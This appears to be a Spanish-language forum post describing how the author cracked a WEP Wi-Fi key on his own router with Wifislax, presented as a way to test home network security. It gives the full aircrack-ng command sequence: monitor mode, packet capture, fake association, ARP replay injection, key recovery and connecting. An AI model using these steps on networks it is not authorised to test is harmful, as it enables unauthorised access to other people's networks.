Buenas tardes a todos!
Este es mi primer post. Espero salga bien.
Quiero comentarles mi experiencia personal con respecto a las redes wifi y sus famosas claves. Con este post no quiero hacer apología del delito, solo es para los que tal vez quieran probar la seguridad de sus redes o se han olvidado la clave WEP y no quieren resetear el MODEM.
Un día me puse a pensar, siendo usuario de Wifi (por comodidad mas que nada), que no quiero que me roben Internet. Esta muy de moda, "colarse" a las redes sin seguridad de los vecinos y allegados. Y pensé "¿como podían llegar a robarme a mi, si tengo clave!?" Leyendo en foros y videos de you tube, me di cuenta que estaba muy equivocado. Por suerte tengo clave WPA2, la cual es muy segura y casi no se puede averiguar. Pero decidí colocar una clave WEP de 5 caracteres y probar cuanto tardaba en descubrirla (no es muy segura) como hace la mayoría de la gente.
Utilice la ultima versión de Wifislax.
Una vez cargado este sistema operativo Linux, empecé a intentar usar las herramientas para ver que podía hacer. Sin éxito. No detectaba la placa inalámbrica. Me di cuenta que el chip de la placa era un RT8187B y el Wifislax no trae los drivers para esta placa (lo verifiqué utilizando el Everest (
http://www.lavalys.com/products.php?ps=UE&lang=en&page=9).
Reinicie la PC, cargue Windows y me puse a investigar arduamente en foros, a ver que conseguía. No tuve mucho éxito, todos los foros decían que esa placa no iba a andar, que era una basura. No había ninguna explicación. Al menos conseguí los drivers de la placa para Linux y decidí que tenía que intentar todo antes de rendirme, aparte quería investigar y me dio mucha bronca que mi placa no fuera compatible (al menos eso dice en los foros).
Aquí les dejo los drivers Los pedi directamente a uno de los encargados de software de realtek (lo contacte por mail con mi spanglish, jojo)
Copie los drivers en una particion de mi disco C:/ (gracias a dios Wifislax monta automáticamente todas las unidades que detecta al inicio, aunque sean NTFS),
Mediante Windows busque la MAC ADD de la placa (la obtuve mediante la consola de DOS, colocas ipconfig -all y la anotamos, nos tiene que dar un numero tipo 11:22:3T:44:F5:66, pueden ser letras y números) o sino directamente de las propiedades de la conexion inalambrica
Reinicie la pc, volví a colocar el LiveCD, inicie nuevamente Wifislax y copie los drivers del disco duro (/mnt/sda1) al directorio ROOT.
Abri una nueva consola y escribí:
(usualmente las consolas están iniciadas en la carpeta root, en donde hemos guardado nuestro archivo)
tar -xvf rtl8187B_linux_26.1052.0225.2009.release.tar.gz (el ultimo es el nombre del archivo, si no lo cambiaron lo dejan así tal cual)
cd rtl8187B_linux_26.1052.0225.2009.release (con esto ingresamos al directorio donde están los drivers)
make (con este comando instalamos los drivers)
./wlan0up (y ahora "levantamos" nuestra placa)
iwconfig (verificamos que ya esta la placa y que todos los parámetros normales)
abrimos una nueva consola
airodump-ng wlan0 (con este comando vemos las redes que estan a nuestro alcance, con su respectiva mac (bssid), canal (ch) y nombre (essid)
airmon-ng start wlan0 6 (de esta manera colocamos nuestra placa en modo monitor, para poder monitorear las redes del canal 6 (#CH) Nos tiene que aparecer un mensaje diciendo que ay esta en modo monitor
cerramos la consola y abrimos una nueva
airodump-ng –w /mnt/sda3/pass –c1 wlan0 (de esta forma empezamos a monitorear las redes del canal 6 y guardamos los resultados en la carpeta mnt que es donde se montan las unidades. Yo la guardare en sda1 que es la unidad C: de Windows con el nombre de pass)
abrimos una nueva consola y ponemos
aireplay-ng -1 30 –e NombreESSID –a MACROUTER –h MACNUESTRA wlan0 (con este comando creamos una asociación entre el router y la pc. Debemos intentar una y otra vez hasta que nos aparezca “association sucefull :-)”
si todo va bien, deberíamos ver algo así
abrimos otra consola y colocamos
aireplay-ng -3 –x600 –b MACROUTER –h MACNUESTRA wlan0 (con esto comenzamos a leer y enviar paquetes y recibir ARP y guardarlos)
una vez que tenemos una gran cantidad de IV´s (#DATA) (a una gran cantidad me refiero a arriba de 60.000 para claves WEP de 64 bits, o sea 5 caracteres ASCII, o arriba de 150.000 para contraseñas WEP de 128 bits o sea 13 caracteres ASCII)
abrimos una nueva consola y utilizaremos el siguiente comando
aircrack-ptw /mnt/sda3/pass-01.cap (aquí es donde habíamos generado el archivo. Ingresamos al directorio y nos fijamos cual de los archivos es el mas grande (en tamaño kb) y lo usaremos para averiguar la clave WEP en tan solo unos segundos, en este caso el mas grande era el pass-01.cap)
Por arte de magia (y algoritmos que ningún mago puede explicar) en tan solo un segundo obtuve la clave WEP en caracteres hexadecimales y ASCII. Pero estuve “conectado” unos 15 minutos.
También pueden obtenerla mediante
aircrack-ng /mnt/sda3/pass-01.cap (tarda unos segundos mas) yo lo probé con los dos y dio el mismo resultado
y configuramos la conexión
iwconfig wlan0 mode managed essid NOMBREDESSID key CLAVEWEP
ahora obtenemos una dirección IP (esto demora unos segundos)
dhcpcd wlan0
probamos un ping al router
y podemos probar nuestra conexión con un ping a Google por ejemplo
ping
www.google.comy ya estamos conectados!
Si no nos agrada navegar por Linux, reiniciamos la PC y cuando vamos a conectaros a la red y nos pida la clave, colocamos la que nos dio el aircrack y listoooo!
Probe introducir una clave WEP de 128 bits (o sea 13 caracteres ASCII) y en 20 minutos la obtuve, de la misma manera que la anterior. Espero les sirva para poder probar la seguridad de sus redes.
En mi casa tengo puesta clave WPA2 y aun no la he podido descifrar con Wifislax, por lo que me parece lo mas seguro del momento.
Gracias a toda la gente del foro que han podido ayudar en mis tantas dudas.
Saludos a todos...
http://www.gigasize.com/get.php?d=qvgmsor46kb